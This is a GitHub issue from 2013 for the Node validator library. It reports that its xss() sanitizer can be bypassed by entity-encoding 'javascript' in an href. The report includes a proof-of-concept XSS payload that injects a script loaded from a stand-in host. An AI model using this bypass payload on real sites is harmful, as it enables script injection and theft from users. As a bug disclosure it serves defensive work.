Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

xss() should remove "javascript" #181

Closed
taku0 opened this issue May 6, 2013 · 0 comments
Closed

xss() should remove "javascript" #181

taku0 opened this issue May 6, 2013 · 0 comments

Comments

@taku0
Copy link

taku0 commented May 6, 2013

xss() removes string "javascript" in attributes; however, this is insufficient since browsers interpret <a href="jav&#x61;script:...">abc</a> as <a href="javascript:...">abc</a>.

Example

var validator = require('validator');

console.log(validator.sanitize("<a href=\"jav&#x61;script:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')\">abc</a>").xss());

Expected

<a >abc</a>

Actual (version 1.1.1)

<a href="jav&#x61;script:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')">abc</a>
chriso added a commit that referenced this issue Oct 31, 2013
@chriso
Remove the XSS filter.
2d5d699 
The xss() function was originally a port of the XSS filter from
CodeIgniter. I added it to the library because there wasn't an
alternative at the time. Unfortunately I don't have the time or
expertise to maintain the XSS filter or keep merging upstream
changes.

If you need one for your app, I suggest looking at Caja sanitisation
engine maintained by Google. (https://code.google.com/p/google-caja/
source/browse/trunk/src/com/google/caja/plugin/html-sanitizer.js)

Closes #123, #138, #181, #206, #210, #221, #223, #226, #227, #231, #232
@chriso chriso closed this as completed Oct 31, 2013
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@chriso @taku0